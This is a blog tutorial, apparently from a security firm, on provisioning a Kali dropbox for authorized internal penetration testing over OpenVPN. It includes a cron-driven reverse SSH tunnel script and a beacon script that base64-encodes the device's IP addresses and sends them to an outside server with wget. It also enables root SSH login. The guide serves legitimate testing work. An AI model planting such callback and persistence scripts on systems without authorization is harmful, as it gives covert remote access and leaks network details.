Penetration Testing Dropbox Part 3 - Provisioning
These are the steps to provision a dropbox to use your newly created OpenVPN infrastructure from part 2.
Introduction
This is part 3 in a series about managing dropboxes for internal penetration testing. This part is all about provisioning a dropbox to be used with our OpenVPN server that we setup in part 2. Follow this tutorial whenever you need to build a dropbox for a client.
Read part 1 and especially part 2 before continuing.
OS Configuration
Install Kali or your favorite distro. After installing Kali, I perform the following minimal changes:
Post Kali Changes
1. SSH Tweaks
Make sure the following options are set in /etc/ssh/sshd_config
:
PermitRootLogin yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
Start SSH and set it to come up on boot:
systemctl start ssh
systemctl enable ssh
2. System Updates
Update kali and basic tools:
apt update
apt -y upgrade
nmap --script-updatedb
echo "setup msf db"
msfdb init
msfconsole -x "db_rebuild_cache;exit"
echo "fix vim, sigh"
echo ':set mouse=v' > ~/.vimrc
3. [optional] Install Custom Scripts/Repos
I use a special user account on my gitlab server specifically for the cloning of custom repos and tools during the provisioning process. I do this so I can freely copy they keys via a script and it doesn't force you to use your personal, highly confidential, SSH keys. If someone steals these keys, its not a big deal, they'd have to have internal access to my network and even then, the repos are read-only.
I copy and paste this script into the terminal.
Setup Failover Scripts
I use two scripts to help with troubleshooting if the VPN cannot establish. The first is a backup reverse ssh connection. The second base64 encodes the current IP and sends it in the URI via wget. This allows me to see if the dropbox receives an IP and can talk outbound across some ports. This is helpful for when OpenVPN fails due to proxies.
Create a reverse SSH script called phonehome.sh
in /root:
#!/bin/bash
createTunnel() {
/usr/bin/ssh -o StrictHostKeyChecking=no -i /root/.ssh/callback -N -R 2222:localhost:22 callback@<PUB_IP_OF_OPENVPN_SRV>
if [[ $? -eq 0 ]]; then
echo Tunnel to jumpbox created successfully
else
echo "[!] error occurred creating a tunnel to jumpbox"
fi
}
/bin/pidof ssh
if [[ $? -ne 0 ]]; then
echo "[+] creating new tunnel connection"
createTunnel
fi
Create a HTTP beaconing script called beacon.sh
in /root:
#! /bin/sh
SERVER="<PUB_IP_OF_OPENVPN_SRV>"
IPINFO=`ifconfig | awk '/inet/{print $2}' | cut -d: -f2 |base64`
wget -T1 -q http://$SERVER/$IPINFO
wget -T1 -q https://$SERVER/$IPINFO
wget -T1 -q http://$SERVER:53/$IPINFO
Set both scripts to be executable:
chmod +x /root/{beacon,phonehome}.sh
Setup cron to execute them periodically. Mine looks like this:
*/5 * * * * root /root/beacon.sh 2>&1
*/1 * * * * root /root/phonehome.sh 2>&1
Create separate SSH keys for the failover script phonehome.sh:
ssh-keygen -b 2048 -t rsa -f /root/.ssh/callback -q -N ""
On the OpenVPN server, create a user named 'callback'. Then copy the SSH pub key you generated from the previous step (/root/.ssh/callback.pub), to the authorized_keys file on the openVPN server: /home/callback/.ssh/authorized_keys
. You might need to create the .ssh directory.
Setup OpenVPN
1. OpenVPN Server-Side Account Setup (Do this on your OpenVPN server)
Create the certificate for your dropbox:
cd /etc/openvpn/easy-rsa
source vars
./build-key $CLIENT01
Create a ccd file in /etc/openvpn/ccd
directory and make sure it's filename matches the CN field of the cert you create ($CLIENT01).
You'll use the iroute
command to define client networks that should be routed through the dropbox.
These are the target networks you're testing. Here is an example of what should be inside your file:
# client networks we want to route through the dropbox
iroute 10.65.0.0 255.255.0.0
iroute 10.66.0.0 255.255.0.0
Lastly, you need to tell OpenVPN what users (pentesters) you want to push these client routes to. This will allow you to reach the client far-end target networks via your own computer. Now you're cooking in your own kitchen! Here is an example of mine (again, the filename must match the CN name of the certs you use to connect to the VPN):
# $client01 networks to route through the pttunnel
push "route 10.65.0.0 255.255.0.0"
push "route 10.66.0.0. 255.255.0.0"
2. OpenVPN Client Configuration (Do this on your dropbox)
Copy certs from your OpenVPN server (I usually buffer copy and paste, but you can SCP them):
- Copy
/etc/openvpn/easy-rsa/ca.crt
from OpenVPN and save it to/etc/openvpn/ca.crt
on your dropbox. - Copy
/etc/openvpn/easy-rsa/$CLIENT01.crt
from OpenVPN and save it to/etc/openvpn/$CLIENT01.crt
on your dropbox. - Copy
/etc/openvpn/easy-rsa/$CLIENT01.key
from OpenVPN and save it to/etc/openvpn/$CLIENT01.key
on your dropbox.
Create the OpenVPN client config in /etc/openvpn/pttunnel.conf
:
client
dev tun
#tls-remote vpn01
proto tcp
remote <PUB_IP_OF_OPENVPN_SRV> 443
remote <PUB_IP_OF_OPENVPN_SRV> 8080
remote <PUB_IP_OF_OPENVPN_SRV> 53
dev tun
persist-key
persist-tun
verb 3
remote-cert-tls server
ca /etc/openvpn/ca.crt
cert /etc/openvpn/$CLIENT.crt
key /etc/openvpn/$CLIENT.key
cipher AES-256-CBC
comp-lzo
3. Testing the VPN
If you're on the same network as the OpenVPN server, you might have problems testing the VPN by its public IP because you'll need a NAT loopback or aka NAT hairpins. To make things easy, you can test by changing the remote directive in the config to be the internal IP and port of the OpenVPN server. I usually monitor logs or run openvpn in the foreground long enough to make sure the tunnel doesn't flap.
4. Set OpenVPN to start on boot
systemctl enable openvpn
5. Setup NAT
You'll want your traffic to look like its sourced from the dropbox itself. To do this, use the following iptables command substituting :
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -d <TARGET_NETWORK> -o eth0 -j MASQUERADE
Troubleshooting
If Kali 2018.2 goes to sleep on you after disabling the screen lock and sleep functions via UI, the following will help disable all suspend, sleep, and hibernation:
systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
Resources and Tips
- It takes stumbling through a few installs to really learn this setup. It's worth it. Hang in there!
- Great resource to learn OpenVPN: https://openvpn.net/community-resources/how-to/
- You can use option
ifconfig-push
to statically set the IP addresses of each OpenVPN client in the CCD files.
Happy Hacking!!!
Continuous Human & Automated Security
The Expert-Driven Offensive
Security Platform
Continuously monitor your attack surface with advanced change detection. Upon change, testers and systems perform security testing. You are alerted and assisted in remediation efforts all contained in a single security application, the Sprocket Platform.
Expert-Driven Offensive Security Platform
- Attack Surface Management
- Continuous Penetration Testing
- Adversary Simulations